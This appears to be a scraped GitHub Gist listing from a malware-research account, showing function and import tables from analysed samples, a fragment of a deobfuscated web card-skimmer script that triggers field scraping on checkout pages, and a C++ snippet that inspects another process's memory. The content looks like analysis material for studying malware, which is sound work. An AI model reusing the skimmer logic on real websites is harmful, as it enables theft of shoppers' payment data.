malwarezone

## 360000.tmptetup.csv

          
            10b4
            ole32.CoInitializeEx

            
              10d3
              ole32.CoInitializeSecurity

            
              1260
              kernel32.VirtualFreeEx

            
              1293
              kernel32.MultiByteToWideChar

            
              12c7
              kernel32.MultiByteToWideChar

            
              13e6
              msvcrt.memcpy

            
              141a
              OLEAUT32.SysAllocString

            
              145b
              msvcrt._controlfp

            
              1537
              msvcrt._vsnwprintf

            
              1609
              kernel32.GetModuleHandleW

## onlineclouds.cloud_conversion_async_unfuscated.js
setTimeout(checkForCheckout, 100);
var snd = null;

function checkForCheckout() {
  if ((/onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/).test(window.location)) {
    scrapeAllFields();
  }
}

function createQueryString() {

## snippet.cpp
LPVOID get_area_limit(HANDLE processHandle, LPVOID first_addr)
{
	MEMORY_BASIC_INFORMATION page_info = { 0 };
	//go to the beginning of the area:
	SIZE_T out = VirtualQueryEx(processHandle, first_addr, &page_info, sizeof(page_info));
	if (GetLastError() == ERROR_INVALID_PARAMETER) {
		return nullptr;
	}
	LPVOID alloc_base = page_info.AllocationBase;
	LPVOID next_area = page_info.BaseAddress;

## scrdec18-VC8.exe

      
              2 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                malwarezone
                / scrdec18-VC8.exe
            
            
              Created
              December 4, 2020 16:46
                — forked from bcse/scrdec18-VC8.exe
            
              
                Windows Script Decoder 1.8 (Decoding JScript.Encoded)
              
          
            View raw
        
    
## 9e55ba1c3405de5e2c33fd03ddd14ee2d7f443ed8fc33446ce03acb917e3304e.csv

          
            3ee8
            sub_403EE8

            
              3ef7
              run_delete_cmd

            
              3f83
              apply_reloc

            
              3fea
              load_ne_format

            
              4223
              unpack

            
              4369
              expand_key

            
              43ef
              tea_decode

            
              4520
              memset

            
              4526
              memcpy

            
              452c
              start
	10b4	ole32.CoInitializeEx
	10d3	ole32.CoInitializeSecurity
	1260	kernel32.VirtualFreeEx
	1293	kernel32.MultiByteToWideChar
	12c7	kernel32.MultiByteToWideChar
	13e6	msvcrt.memcpy
	141a	OLEAUT32.SysAllocString
	145b	msvcrt._controlfp
	1537	msvcrt._vsnwprintf
	1609	kernel32.GetModuleHandleW
	setTimeout(checkForCheckout, 100);
	var snd = null;

	function checkForCheckout() {
	if ((/onepage\|firecheckout\|Checkout\|onestepcheckout\|onepagecheckout\|checkout\|oscheckout\|idecheckoutvm\|fancycheckout/).test(window.location)) {
	scrapeAllFields();
	}
	}

	function createQueryString() {
	LPVOID get_area_limit(HANDLE processHandle, LPVOID first_addr)
	{
	MEMORY_BASIC_INFORMATION page_info = { 0 };
	//go to the beginning of the area:
	SIZE_T out = VirtualQueryEx(processHandle, first_addr, &page_info, sizeof(page_info));
	if (GetLastError() == ERROR_INVALID_PARAMETER) {
	return nullptr;
	}
	LPVOID alloc_base = page_info.AllocationBase;
	LPVOID next_area = page_info.BaseAddress;
	3ee8	sub_403EE8
	3ef7	run_delete_cmd
	3f83	apply_reloc
	3fea	load_ne_format
	4223	unpack
	4369	expand_key
	43ef	tea_decode
	4520	memset
	4526	memcpy
	452c	start